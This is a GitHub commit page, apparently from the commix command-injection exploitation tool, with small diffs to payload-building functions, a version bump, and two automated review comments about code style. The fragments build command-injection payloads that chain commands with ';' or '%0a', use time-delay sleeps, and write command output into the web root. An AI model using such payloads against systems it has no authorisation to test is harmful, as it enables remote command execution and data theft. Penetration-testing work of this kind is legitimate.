Trivial update
stasinopoulos committed Jan 31, 2025
1 parent 7f2a0dd commit 4117ade
Showing 5 changed files with 8 additions and 5 deletions.
Original file line number Diff line number Diff line change
@@ -244,6 +244,7 @@ def cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_reque
"cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
)
else:
settings.USER_APPLIED_CMD = cmd
if separator == ";" or separator == "%0a":
payload = (separator +
# Find the length of the output, using readline().
@@ -385,6 +386,7 @@ def get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http
"cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
)
else:
settings.USER_APPLIED_CMD = cmd
if separator == ";" or separator == "%0a":
payload = (separator +
"str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator +
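Review bot: The added `settings.USER_APPLIED_CMD = cmd` in the `else:` branches of cmd_execution_alter_shell and get_char_alter_shell writes module-level state from inside functions whose visible job is to build a payload string, and it carries no comment saying why. The same line is added in the `else:` branch of cmd_execution_alter_shell in the three other unnamed file sections on this page, always on the `else:` side only, so whether the first branch records the command cannot be seen from here. If both branches need the value, assign it once above the `if`; either way a comment such as `# Record the command as supplied, before it is wrapped into the payload.` would document the side effect. Both functions begin and end outside the hunks.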
Original file line number Diff line number Diff line change
@@ -222,6 +222,7 @@ def cmd_execution_alter_shell(separator, TAG, cmd):
separator + "echo '" + TAG + "'`)%3B"
)
else:
settings.USER_APPLIED_CMD = cmd
if separator == "":
payload = ("print(`echo " + TAG + "`." +
"`echo " + TAG + "`." +
Original file line number Diff line number Diff line change
@@ -71,7 +71,6 @@ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE):
Execute shell commands on vulnerable host.
"""
def cmd_execution(separator, cmd, OUTPUT_TEXTFILE):

if settings.TFB_DECIMAL == True:
payload = (separator + cmd)

@@ -87,7 +86,6 @@ def cmd_execution(separator, cmd, OUTPUT_TEXTFILE):
payload = (separator +
cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE
)

return payload

"""
@@ -106,9 +104,11 @@ def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE):
"') do @set /p = %i " + settings.CMD_NUL
)
else:
settings.USER_APPLIED_CMD = cmd
cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX
payload = (separator +
settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" +
settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
settings.CMD_SUB_PREFIX + "echo " + cmd_exec + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
)

# New line fixation
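Review bot: The new local `cmd_exec` in the `else:` branch of cmd_execution_alter_shell is used exactly once, on the rewritten `f.write` line, and its name does not say that it holds `cmd` wrapped in `settings.CMD_SUB_PREFIX` / `settings.CMD_SUB_SUFFIX`. The rewritten line is equivalent to the one it replaces, but the outer `settings.CMD_SUB_PREFIX + "echo " + ... + settings.CMD_SUB_SUFFIX` is still concatenated by hand around it, so the nesting remains hard to check by eye. A short comment such as `# cmd wrapped in command-substitution delimiters` above the assignment would help. The payload lines in the other sections on this page keep the same expression inline, so it would be more consistent to use the local everywhere or nowhere. The function begins and ends outside the hunk.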
Original file line number Diff line number Diff line change
@@ -205,7 +205,6 @@ def cmd_execution(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_request_meth

else:
settings.USER_APPLIED_CMD = cmd

if separator == ";" or separator == "%0a" :
payload = (separator +
"str=" + settings.CMD_SUB_PREFIX + cmd + settings.FILE_WRITE_OPERATOR + OUTPUT_TEXTFILE + separator + " tr '\\n' ' ' < " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator +
@@ -289,6 +288,7 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_
"cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\""
)
else:
settings.USER_APPLIED_CMD = cmd
if separator == ";" or separator == "%0a" :
payload = (separator +
settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator +
2 changes: 1 addition & 1 deletion src/utils/settings.py
@@ -262,7 +262,7 @@ def sys_argv_errors():
DESCRIPTION = "The command injection exploiter"
AUTHOR = "Anastasios Stasinopoulos"
VERSION_NUM = "4.1"
REVISION = "7"
REVISION = "8"
STABLE_RELEASE = False
VERSION = "v"
if STABLE_RELEASE:

0 comments on commit 4117ade
